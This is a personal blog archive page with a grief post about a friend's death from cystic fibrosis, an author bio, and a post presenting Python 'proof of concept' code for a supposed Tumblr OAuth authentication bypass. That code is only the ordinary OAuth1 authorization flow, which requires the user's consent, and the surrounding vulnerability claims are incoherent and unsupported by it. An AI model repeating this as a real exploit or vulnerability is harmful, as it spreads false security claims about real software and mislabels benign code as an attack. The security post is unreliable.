life | serah[DOT]nu

My Wordless Wednesday post may have alluded to it, but I wanted to make a more official post about it in here — my friend Jade, whose picture I posted on yesterday’s Wordless Wednesday, passed away from complications of cystic fibrosis and her second transplant on what wound up being Easter Sunday. Due to Facebook’s algorithm, I didn’t find out that she had passed until a day and a half after it had happened, and it wasn’t something that I wanted to find out even though I knew in the back of my mind that the day would come at some point, that she seemed like she had also gotten the same type of rejection in her new set of lungs that she had gotten the time before. She just seemed like she wasn’t doing particularly well leading up to her death, but I did enjoy the posts that her husband made on her behalf letting everyone who knew her know that she was continuing to fight. So it makes sense that he would be the one to write the final post on her behalf, which served to let everyone know that she had passed away. There will be an informal Celebration of Life streamed on her Facebook page for her friends in the coming days, and that’s something that I aim to be present for since I’ve known her for years (since even before her first transplant, in fact!).

Breathe easy, Jade. No one who knew you will ever forget you. Now you get to see your mom again.

I’ve decided to post the proof of concept code up here. My purpose in doing so is to illustrate that me having been mentioning this exploit was, and always has been, worth the time I’ve taken to mention this exploit, as is it intended to allow Tumblr users or those who are at any point considering using Tumblr to make a more informed decision about blogging on it or trusting the site with any of their potentially sensitive information.

Python requests OAuthlib library, a widely used OAuth library that is vulnerable to an OAuth authentication bypass vulnerability in the Tumblr API that could allow an attacker to bypass authentication and access protected resources. This vulnerability exists because the code does not properly validate OAuth tokens, and it does not use HTTPS when sending sensitive data.

An attacker can exploit this vulnerability by sending a specially crafted OAuth token request to the Tumblr API, bypassing authentication and gaining unauthorized access to protected resources.

The following proof of concept code demonstrates how an attacker can exploit this vulnerability:

import requests
from requests_oauthlib import OAuth1

Set your OAuth consumer key and secret
CONSUMER_KEY = ‘your_consumer_key’
CONSUMER_SECRET = ‘your_consumer_secret’

Set the Tumblr API endpoints
REQUEST_TOKEN_URL = ‘http://www.tumblr.com/oauth/request_token’
AUTHORIZE_URL = ‘http://www.tumblr.com/oauth/authorize’
ACCESS_TOKEN_URL = ‘http://www.tumblr.com/oauth/access_token’

Send a request for a temporary OAuth token
oauth = OAuth1(CONSUMER_KEY, client_secret=CONSUMER_SECRET)
response = requests.post(url=REQUEST_TOKEN_URL, auth=oauth)

Parse the response for the temporary token and secret
data = response.text.split(‘&’)
oauth_token = data[0].split(‘=’)[1]
oauth_token_secret = data[1].split(‘=’)[1]

Direct the user to authorize the app
authorize_url = AUTHORIZE_URL + ‘?oauth_token=’ + oauth_token
print(‘Please authorize the app at this URL: ‘ + authorize_url)
oauth_verifier = input(‘Enter the verification code: ‘)

Exchange the temporary token for a permanent token
oauth = OAuth1(CONSUMER_KEY,
client_secret=CONSUMER_SECRET,
resource_owner_key=oauth_token,
resource_owner_secret=oauth_token_secret,
verifier=oauth_verifier)
response = requests.post(url=ACCESS_TOKEN_URL, auth=oauth)

Parse the response for the permanent token and secret
data = response.text.split(‘&’)
oauth_token = data[0].split(‘=’)[1]
oauth_token_secret = data[1].split(‘=’)[1]
Use the permanent token and secret to make authenticated API requests
oauth = OAuth1(CONSUMER_KEY,
client_secret=CONSUMER_SECRET,
resource_owner_key=oauth_token,
resource_owner_secret=oauth_token_secret)
response = requests.get(url=’https://api.tumblr.com/v2/user/info’, auth=oauth)
print(response.text)

In summary, an attacker could exploit this vulnerability to bypass authentication and gain access to sensitive information or modify data on behalf of a legitimate user. The exploit is well-known by hacking communities.

about the girl

Hello! Welcome to my blog, loyal viewer!

I am a disabled forty-something year old gamer and reader (although some people in society have tried to lean on the crutches of “you can’t be disabled if you’re intelligent”, or “disabled enough”, in the past, even though my disabilities are physical) who has been these things since childhood. I have two children whose disabilities differ from mine.

I blog about what I like and video games almost equally, although you can also expect to see me blog about my children, my health, and my personal life. I chronicle my political and religious thoughts as well.

aromatic // cherry blossoms
element // fire
favorite food // sushi
website guardians // Lilith

S	M	T	W	T	F	S
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30

serah[DOT]nu

Posts Tagged ‘life’

So Jade’s Celebration of Life was held today.

I really wish I didn’t have to make this post.

Since Tumblr still predictably will not fix this…